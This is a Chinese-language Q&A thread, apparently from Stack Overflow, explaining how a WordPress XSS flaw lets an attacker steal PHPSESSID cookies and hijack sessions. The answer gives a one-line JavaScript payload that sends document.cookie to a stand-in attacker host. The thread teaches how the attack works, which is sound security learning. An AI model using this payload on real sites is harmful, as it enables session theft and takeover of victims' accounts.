【问题标题】:Wordpress XSS vulnerabilty (grabbing PHPSESSID)Wordpress XSS 漏洞(抓取 PHPSESSID)
【发布时间】:2013-05-04 18:35:27
【问题描述】:

我刚开始研究网站的漏洞,我对 Wordpress 的 XSS 漏洞有疑问。利用这个漏洞,攻击者可以通过一个简单的 Javascript 命令获取 PHPSESSID:

(alert(document.cookie))

攻击者如何使用它?这是否是一个严重的安全问题?

【问题讨论】:

  • XSS 是一种非常常见且严重的安全威胁。 XSS 是最基本的漏洞之一,需要学习的东西很多。

标签: wordpress security xss


【解决方案1】:

alert(…) 只是一个proof of concept,它证明了对 XSS 漏洞的成功利用。它不会用于实际攻击,因为它不会给攻击者带来任何好处。

在真正的攻击中,攻击者会尝试以某种方式获取document.cookie 的值。一个简单的例子是使用 JavaScript 伪造一个包含 document.cookie 值的简单 HTTP 请求,如下所示:

new Image().src="http://evil.example/?"+document.cookie

这会创建一个带有攻击者 URL 作为图像源的图像,其中附加了 cookie。

利用受害者的 cookie,攻击者可能能够hijack the victim’s session 并以与受害者相同的权限使用 WordPress。如果受害者是管理员,攻击者将有权访问管理功能。

【讨论】:

  • 好的,但是攻击者如何使用这个cookie呢?他最终可以提升 Wordpress 网站的权限吗?
  • @user2131170 哦,是的,忘记了。相应地更新了我的答案。
  • 嗯,好的。我认为攻击者,当他获取 PHPSESSID 值时,他可以简单地在浏览器中添加 cookie,并以与受害者相同的权限登录 Wordpress。对不对?
  • @user2131170 是的,这基本上就是会话劫持的工作方式。
猜你喜欢
  • 2023-04-07
  • 1970-01-01
  • 2012-03-10
  • 2015-07-11
  • 2011-12-03
  • 2012-06-21
  • 2022-01-12
  • 1970-01-01
  • 2021-05-01
相关资源
最近更新 更多